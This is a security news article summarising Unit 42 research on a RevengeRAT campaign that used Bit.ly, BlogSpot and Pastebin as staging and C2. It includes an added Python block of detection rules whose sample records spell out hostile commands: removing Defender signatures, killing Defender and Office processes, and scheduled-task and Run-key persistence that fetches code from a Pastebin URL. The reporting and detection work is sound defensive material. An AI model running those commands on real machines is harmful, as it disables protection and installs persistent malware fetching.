
Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out in March by threat actors tracked as “Aggah,” who used pages hosted on Bit.ly, BlogSpot, and Pastebin as command-and-control (C2) infrastructure to distribute RevengeRAT.

Attackers hit organizations in several industries, including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other professional businesses.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The use of legitimate services to deliver the malware is aimed at avoiding detection.

RevengeRAT variants have been used by different APT groups, such as the Gorgon Group, which hit entities in the UK, Spain, Russia, and the US. The source code of the RAT was publicly leaked a few years ago, so it could well be part of multiple campaigns conducted by several threat actors.

RevengeRAT allows operators to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump user passwords, access the webcam, and perform many other actions.

The researchers analyzed a bait document built to load a malicious macro-enabled document from a remote server via template injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victims open the decoy document, it displays a lure image designed to trick them into turning on Microsoft Office macros by clicking “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro is loaded using template injection.

The OLE file loads an embedded Excel document, which downloads a malicious script from a URL shortened with the Bit.ly service. In other attacks, the malicious code was downloaded in a similar way from a BlogSpot domain hosting malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling Protected View in Office, and the tactic of killing processes for Windows Defender and Microsoft Office applications, were employed by the Gorgon Group in past campaigns.

Once downloaded on a victim’s machine, the script performs the following main actions:

• Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL
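Detection logic for the behaviours described above, written as an added example that is not part of the original article or the Unit 42 report: three rules run over constructed process-creation records (placeholder task names, loader names and URLs) and flag Defender signature removal, termination of Defender or Office processes, and scheduled tasks or Run keys whose payload is fetched from a Pastebin raw URL. The `MpCmdRun.exe -RemoveDefinitions` check is an assumption about how signature removal looks on the command line; the report does not state the exact command used.

```python
import re

# Constructed process-creation records (not from the report): (process, command line)
# pairs in the shape an EDR or Sysmon Event ID 1 feed would produce. Task names,
# loader names and URLs are deliberate placeholders.
SAMPLE_EVENTS = [
    ("MpCmdRun.exe", "MpCmdRun.exe -RemoveDefinitions -All"),
    ("taskkill.exe", "taskkill /f /im MsMpEng.exe"),
    ("taskkill.exe", "taskkill /f /im winword.exe /im excel.exe"),
    ("schtasks.exe", 'schtasks /create /sc minute /mo 60 /tn "PLACEHOLDER_TASK" '
                     '/tr "PLACEHOLDER_LOADER https://pastebin.com/raw/PLACEHOLDER"'),
    ("reg.exe", 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
                '/v PLACEHOLDER /d "PLACEHOLDER_LOADER https://pastebin.com/raw/PLACEHOLDER" /f'),
    ("svchost.exe", "svchost.exe -k netsvcs"),                                   # benign
    ("schtasks.exe", 'schtasks /create /tn "Backup" /tr "C:\\Tools\\backup.exe" /sc daily'),  # benign
]

PASTEBIN_RAW = re.compile(r"https?://(?:www\.)?pastebin\.com/raw/", re.I)
# Processes the script is reported to kill: the Defender engine and Office applications.
KILL_WATCHLIST = {"msmpeng.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def rule_defender_definitions_removed(proc, cmd):
    # Assumption: "removing its signature set" surfaces as MpCmdRun -RemoveDefinitions.
    return proc.lower() == "mpcmdrun.exe" and "-removedefinitions" in cmd.lower()

def rule_watchlist_process_killed(proc, cmd):
    # taskkill naming any Defender or Office image via one or more /im switches.
    if proc.lower() != "taskkill.exe":
        return False
    targets = {t.lower() for t in re.findall(r"/im\s+(\S+)", cmd, re.I)}
    return bool(targets & KILL_WATCHLIST)

def rule_pastebin_persistence(proc, cmd):
    # Scheduled-task creation or Run-key write whose command pulls from a Pastebin raw URL.
    if not PASTEBIN_RAW.search(cmd):
        return False
    low = cmd.lower()
    is_task = proc.lower() == "schtasks.exe" and "/create" in low
    is_runkey = proc.lower() == "reg.exe" and "\\currentversion\\run" in low
    return is_task or is_runkey

RULES = [
    ("defender_definitions_removed", rule_defender_definitions_removed),
    ("watchlist_process_killed", rule_watchlist_process_killed),
    ("pastebin_persistence", rule_pastebin_persistence),
]

def triage(events):
    """Return (rule_name, command_line) for every record that matches a rule."""
    return [(name, cmd) for proc, cmd in events for name, rule in RULES if rule(proc, cmd)]
```

Any single hit is worth a look, but the report's chain shows all three rules firing on one host within minutes, so correlating them per host is the stronger signal.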

The last-stage malware is downloaded from Pastebin; it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

The analysis of a single Bit.ly shortened URL revealed it had been clicked over 1,900 times by targets in roughly 20 countries, which gives an idea of the extent of the campaign.

The analysis of the decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”


Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)
